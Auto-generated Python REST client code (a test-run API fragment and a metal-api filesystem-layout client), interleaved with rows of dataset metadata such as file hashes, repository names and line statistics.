        """Update multiple runs with common metadata  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.bulk_update(update_run, async_req=True)
        >>> result = thread.get()

        Args:
            update_run (UpdateRun): The metadata to add to the test runs

        Keyword Args:
            filter ([str]): Fields to filter by. [optional]
            page_size (int): Set the number of items per page, defaults to 25. [optional]
            _return_http_data_only (bool): response data without head status
                code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number provided, it will be total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
            async_req (bool): execute request asynchronously

        Returns:
            RunList
                If the method is called asynchronously, returns the request
                thread.
        """
        # Fill in client-behaviour defaults when the caller omits them.
        kwargs['async_req'] = kwargs.get(
            'async_req', False
        )
        kwargs['_return_http_data_only'] = kwargs.get(
            '_return_http_data_only', True
        )
        kwargs['_preload_content'] = kwargs.get(
            '_preload_content', True
        )
        kwargs['_request_timeout'] = kwargs.get(
            '_request_timeout', None
        )
        kwargs['_check_input_type'] = kwargs.get(
            '_check_input_type', True
        )
        kwargs['_check_return_type'] = kwargs.get(
            '_check_return_type', True
        )
        kwargs['_host_index'] = kwargs.get('_host_index')
        # The positional argument travels to the endpoint via kwargs.
        kwargs['update_run'] = \
            update_run
        return self.bulk_update_endpoint.call_with_http_info(**kwargs)

    def get_run(
        self,
        id,
        **kwargs
    ):
        """Get a single run by ID (uuid required)  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_run(id, async_req=True)
        >>> result = thread.get()

        Args:
            id (str): ID of test run

        Keyword Args:
            _return_http_data_only (bool): response data without head status
                code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number provided, it will be total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
            async_req (bool): execute request asynchronously

        Returns:
            Run
                If the method is called asynchronously, returns the request
                thread.
        """
        # Fill in client-behaviour defaults when the caller omits them.
        kwargs['async_req'] = kwargs.get(
            'async_req', False
        )
        kwargs['_return_http_data_only'] = kwargs.get(
            '_return_http_data_only', True
        )
        kwargs['_preload_content'] = kwargs.get(
            '_preload_content', True
        )
        kwargs['_request_timeout'] = kwargs.get(
            '_request_timeout', None
        )
        kwargs['_check_input_type'] = kwargs.get(
            '_check_input_type', True
        )
        kwargs['_check_return_type'] = kwargs.get(
            '_check_return_type', True
        )
        kwargs['_host_index'] = kwargs.get('_host_index')
        # The positional argument travels to the endpoint via kwargs.
        kwargs['id'] = \
            id
        return self.get_run_endpoint.call_with_http_info(**kwargs)

    def get_run_list(
        self,
        **kwargs
    ):
        """Get a list of the test runs  # noqa: E501

        The `filter` parameter takes a list of filters to apply in the form of:     {name}{operator}{value}  where:    - `name` is any valid column in the database   - `operator` is one of `=`, `!`, `>`, `<`, `)`, `(`, `~`, `*`   - `value` is what you want to filter by  Operators are simple correspondents to MongoDB's query selectors:    - `=` becomes `$eq`   - `!` becomes `$ne`   - `>` becomes `$gt`   - `<` becomes `$lt`   - `)` becomes `$gte`   - `(` becomes `$lte`   - `~` becomes `$regex`   - `*` becomes `$in`   - `@` becomes `$exists`  Notes:  - For the `$exists` operator, \"true\", \"t\", \"yes\", \"y\" and `1` will all be considered true, all other values are considered false.  Example queries:      /run?filter=metadata.jenkins.job_name=jenkins_job     /run?filter=summary.failures>0   # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_run_list(async_req=True)
        >>> result = thread.get()

        Keyword Args:
            filter ([str]): Fields to filter by. [optional]
            estimate (bool): Return an estimated count. [optional]
            page (int): Set the page of items to return, defaults to 1. [optional]
            page_size (int): Set the number of items per page, defaults to 25. [optional]
            _return_http_data_only (bool): response data without head status
                code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number provided, it will be total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
            async_req (bool): execute request asynchronously

        Returns:
            RunList
                If the method is called asynchronously, returns the request
                thread.
        """
        # Fill in client-behaviour defaults when the caller omits them.
        kwargs['async_req'] = kwargs.get(
            'async_req', False
        )
        kwargs['_return_http_data_only'] = kwargs.get(
            '_return_http_data_only', True
        )
        kwargs['_preload_content'] = kwargs.get(
            '_preload_content', True
        )
        kwargs['_request_timeout'] = kwargs.get(
            '_request_timeout', None
        )
        kwargs['_check_input_type'] = kwargs.get(
            '_check_input_type', True
        )
        kwargs['_check_return_type'] = kwargs.get(
            '_check_return_type', True
        )
        kwargs['_host_index'] = kwargs.get('_host_index')
        return self.get_run_list_endpoint.call_with_http_info(**kwargs)

    def update_run(
        self,
        id,
        run,
        **kwargs
    ):
        """Update a single run  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.update_run(id, run, async_req=True)
        >>> result = thread.get()

        Args:
            id (str): ID of the test run
            run (Run): The updated test run

        Keyword Args:
            _return_http_data_only (bool): response data without head status
                code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number provided, it will be total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
            async_req (bool): execute request asynchronously

        Returns:
            Run
                If the method is called asynchronously, returns the request
                thread.
        """
        # Fill in client-behaviour defaults when the caller omits them.
        kwargs['async_req'] = kwargs.get(
            'async_req', False
        )
        kwargs['_return_http_data_only'] = kwargs.get(
            '_return_http_data_only', True
        )
        kwargs['_preload_content'] = kwargs.get(
            '_preload_content', True
        )
        kwargs['_request_timeout'] = kwargs.get(
            '_request_timeout', None
        )
        kwargs['_check_input_type'] = kwargs.get(
            '_check_input_type', True
        )
        kwargs['_check_return_type'] = kwargs.get(
            '_check_return_type', True
        )
        kwargs['_host_index'] = kwargs.get('_host_index')
        # The positional arguments travel to the endpoint via kwargs.
        kwargs['id'] = \
            id
        kwargs['run'] = \
            run
        return self.update_run_endpoint.call_with_http_info(**kwargs)
| 34.580153
| 819
| 0.4683
| 2,085
| 22,650
| 4.870024
| 0.117506
| 0.032795
| 0.025606
| 0.026591
| 0.812192
| 0.798602
| 0.795942
| 0.778905
| 0.74414
| 0.72858
| 0
| 0.003619
| 0.438764
| 22,650
| 654
| 820
| 34.633028
| 0.795154
| 0.373289
| 0
| 0.651481
| 1
| 0
| 0.210178
| 0.025327
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013667
| false
| 0
| 0.015945
| 0
| 0.04328
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8f5f93e29db7d1d7dcd402aeed83092a8cdd935
| 27,417
|
py
|
Python
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | 7
|
2020-12-21T05:24:24.000Z
|
2022-02-12T20:55:32.000Z
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | 6
|
2020-09-16T07:23:34.000Z
|
2022-01-18T12:05:30.000Z
|
metal_python/api/filesystemlayout_api.py
|
metal-stack/metal-python
|
cdf40fa86d2b2944f9818cef1c6723b1eecc506e
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal_python.api_client import ApiClient
class FilesystemlayoutApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_filesystem_layout(self, body, **kwargs): # noqa: E501
"""create a filesystemlayout. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutCreateRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
    def create_filesystem_layout_with_http_info(self, body, **kwargs):  # noqa: E501
        """create a filesystemlayout. if the given ID already exists a conflict is returned  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.create_filesystem_layout_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param V1FilesystemLayoutCreateRequest body: (required)
        :return: V1FilesystemLayoutResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword names accepted besides the positional parameters.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures 'self', 'body' and 'kwargs'; validated kwargs
        # are merged in below and the raw 'kwargs' entry is dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_filesystem_layout" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `create_filesystem_layout`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/filesystemlayout', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1FilesystemLayoutResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_filesystem_layout(self, id, **kwargs): # noqa: E501
"""deletes an filesystemlayout and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_filesystem_layout(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
return data
    def delete_filesystem_layout_with_http_info(self, id, **kwargs):  # noqa: E501
        """deletes an filesystemlayout and returns the deleted entity  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.delete_filesystem_layout_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: identifier of the filesystemlayout (required)
        :return: V1FilesystemLayoutResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword names accepted besides the positional parameters.
        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures 'self', 'id' and 'kwargs'; validated kwargs
        # are merged in below and the raw 'kwargs' entry is dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_filesystem_layout" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `delete_filesystem_layout`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/filesystemlayout/{id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1FilesystemLayoutResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_filesystem_layout(self, id, **kwargs): # noqa: E501
"""get filesystemlayout by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_filesystem_layout(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the filesystemlayout (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_filesystem_layout_with_http_info(id, **kwargs) # noqa: E501
return data
    def get_filesystem_layout_with_http_info(self, id, **kwargs):  # noqa: E501
        """get filesystemlayout by id  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_filesystem_layout_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str id: identifier of the filesystemlayout (required)
        :return: V1FilesystemLayoutResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword names accepted besides the positional parameters.
        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures 'self', 'id' and 'kwargs'; validated kwargs
        # are merged in below and the raw 'kwargs' entry is dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_filesystem_layout" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `get_filesystem_layout`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/filesystemlayout/{id}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1FilesystemLayoutResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_filesystem_layouts(self, **kwargs): # noqa: E501
"""get all filesystemlayouts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_filesystem_layouts(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[V1FilesystemLayoutResponse]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_filesystem_layouts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_filesystem_layouts_with_http_info(**kwargs) # noqa: E501
return data
    def list_filesystem_layouts_with_http_info(self, **kwargs):  # noqa: E501
        """get all filesystemlayouts  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_filesystem_layouts_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[V1FilesystemLayoutResponse]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # No positional parameters; only the client-behaviour keywords.
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures 'self' and 'kwargs'; validated kwargs are
        # merged in below and the raw 'kwargs' entry is dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_filesystem_layouts" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/filesystemlayout', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[V1FilesystemLayoutResponse]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def match_filesystem_layout(self, body, **kwargs): # noqa: E501
"""check if the given machine id satisfies the disk requirements of the filesystemlayout in question # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.match_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutMatchRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.match_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.match_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
    def match_filesystem_layout_with_http_info(self, body, **kwargs):  # noqa: E501
        """check if the given machine id satisfies the disk requirements of the filesystemlayout in question  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.match_filesystem_layout_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param V1FilesystemLayoutMatchRequest body: (required)
        :return: V1FilesystemLayoutResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword names accepted besides the positional parameters.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() captures 'self', 'body' and 'kwargs'; validated kwargs
        # are merged in below and the raw 'kwargs' entry is dropped.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method match_filesystem_layout" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `match_filesystem_layout`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/filesystemlayout/matches', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1FilesystemLayoutResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def try_filesystem_layout(self, body, **kwargs): # noqa: E501
"""try to detect a filesystemlayout based on given size and image. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.try_filesystem_layout(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1FilesystemLayoutTryRequest body: (required)
:return: V1FilesystemLayoutResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.try_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.try_filesystem_layout_with_http_info(body, **kwargs) # noqa: E501
return data
def try_filesystem_layout_with_http_info(self, body, **kwargs):  # noqa: E501
    """try to detect a filesystemlayout based on given size and image.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.try_filesystem_layout_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param V1FilesystemLayoutTryRequest body: (required)
    :return: V1FilesystemLayoutResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Names accepted either positionally or through **kwargs.
    all_params = ['body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # Merge the explicit argument with the keyword arguments, rejecting
    # anything the endpoint does not understand.
    params = {'body': body}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method try_filesystem_layout" % key
            )
        params[key] = val

    # verify the required parameter 'body' is set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `try_filesystem_layout`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    # Both request and response bodies are JSON.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    body_params = params.get('body')

    # Authentication setting
    auth_settings = ['HMAC', 'jwt']  # noqa: E501

    return self.api_client.call_api(
        '/v1/filesystemlayout/try', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='V1FilesystemLayoutResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_filesystem_layout(self, body, **kwargs):  # noqa: E501
    """updates a filesystemlayout. if the filesystemlayout was changed since this one was read, a conflict is returned  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_filesystem_layout(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param V1FilesystemLayoutUpdateRequest body: (required)
    :return: V1FilesystemLayoutResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always unwraps the response payload instead
    # of returning the (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous call: hand the request thread straight back.
        return self.update_filesystem_layout_with_http_info(body, **kwargs)  # noqa: E501
    data = self.update_filesystem_layout_with_http_info(body, **kwargs)  # noqa: E501
    return data
def update_filesystem_layout_with_http_info(self, body, **kwargs):  # noqa: E501
    """updates a filesystemlayout. if the filesystemlayout was changed since this one was read, a conflict is returned  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.update_filesystem_layout_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param V1FilesystemLayoutUpdateRequest body: (required)
    :return: V1FilesystemLayoutResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Names accepted either positionally or through **kwargs.
    all_params = ['body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # Merge the explicit argument with the keyword arguments, rejecting
    # anything the endpoint does not understand.
    params = {'body': body}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_filesystem_layout" % key
            )
        params[key] = val

    # verify the required parameter 'body' is set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `update_filesystem_layout`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    query_params = []
    form_params = []
    local_var_files = {}

    # Both request and response bodies are JSON.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    body_params = params.get('body')

    # Authentication setting
    auth_settings = ['HMAC', 'jwt']  # noqa: E501

    # NOTE: the update endpoint is modelled as POST on the collection path
    # in this API's spec (optimistic locking handled server-side).
    return self.api_client.call_api(
        '/v1/filesystemlayout', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='V1FilesystemLayoutResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 38.834278
| 156
| 0.615458
| 3,040
| 27,417
| 5.302303
| 0.067105
| 0.046157
| 0.024319
| 0.031267
| 0.95893
| 0.95893
| 0.953037
| 0.940505
| 0.940505
| 0.940505
| 0
| 0.016839
| 0.296021
| 27,417
| 705
| 157
| 38.889362
| 0.8183
| 0.328665
| 0
| 0.827225
| 0
| 0
| 0.177205
| 0.062174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039267
| false
| 0
| 0.010471
| 0
| 0.10733
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8fe4f97a68daea78c591a8bfef2d60f792348c8
| 64,579
|
py
|
Python
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2019-08-01T06:16:17.000Z
|
2021-04-16T20:00:02.000Z
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2020-09-27T12:03:24.000Z
|
2021-08-06T18:01:32.000Z
|
splunk_sdk/ingest/v1beta2/gen_models.py
|
ianlee4/splunk-cloud-sdk-python
|
d2870cd1e506d3844869d17becdcdf9d8d60a9a1
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
